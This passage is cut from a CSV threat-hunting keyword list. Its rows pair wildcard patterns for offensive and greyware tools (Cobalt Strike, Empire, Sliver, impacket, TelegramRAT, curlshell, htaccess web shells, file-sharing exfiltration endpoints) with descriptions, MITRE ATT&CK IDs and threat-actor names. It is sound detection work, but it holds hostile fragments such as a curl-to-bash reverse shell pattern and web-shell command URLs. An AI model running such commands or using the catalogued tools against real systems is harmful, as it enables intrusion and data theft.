movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*HttpEvilClippyController*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*httpntlm.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*httpntlm.old*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*httppayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*HttpProxyScan_Log4J2.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*httprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httprelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http-request-smuggler-all.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*https://*.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*https://*.brs.devtunnels.ms/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*https://*.euw.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*https://*.screenconnect.com/Bin/*.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*https://*.sendspace.com/upload*","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://*.use.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*https://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*https://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*https://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" +"*https://0.0.0.0:1337*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*https://aka.ms/DevTunnelCliInstall*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*https://amsi.fail/*","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://anonfiles.com/*/*","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://anymailfinder.com/search/*","greyware_tool_keyword","anymailfinder","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://anymailfinder.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://api.anonfiles.com/upload*","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://api.dropboxapi.com/*","greyware_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","Dropbox API calls - Understanding your environment with the applications used and allowed will enhances the effectiveness of your hunt here","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*https://api.hunter.io/*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","1","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*https://api.openai.com/v1/files*","greyware_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","0","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*https://api.telegram.org/bot*/sendMessage*","greyware_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*https://bashupload.com*","greyware_tool_keyword","bashupload.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*https://cyseclabs.com/exploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*https://dnsdumpster.com/*","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*https://download.advanced-ip-scanner.com/download/files/*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://file.io/*","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://file.io/?title=*","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*https://github-com.translate.goog/*","greyware_tool_keyword","translate.goog","accessing github through google translate (evasion) false positive risk","T1090.003","TA0005","N/A","N/A","Defense Evasion","https://*-com.translate.goog/*","0","1","N/A","1","3","N/A","N/A","N/A","N/A" +"*https://gitlab.com/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://hunter.io/*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://ipv4.myip.wtf/text*","greyware_tool_keyword","ipv4.myip.wtf","get public ip address. Used by disctopia-c2","T1016 - T1071.001","TA0005 - TA0002","N/A","N/A","Reconnaissance","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py","1","1","greyware_tools high risks of false positives","N/A","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*https://kali.download/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*","greyware_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*https://myexternalip.com/raw*","greyware_tool_keyword","myexternalip.com","return external ip address","T1046 - T1595 - T1595.001","TA0007 - TA0040","N/A","N/A","Reconnaissance","https://myexternalip.com/raw","1","1","False positives warning - used by some C2 projects but legitimate site","1","6","N/A","N/A","N/A","N/A" +"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*https://t.me/BotFather*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*https://t.me/machine1337*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - 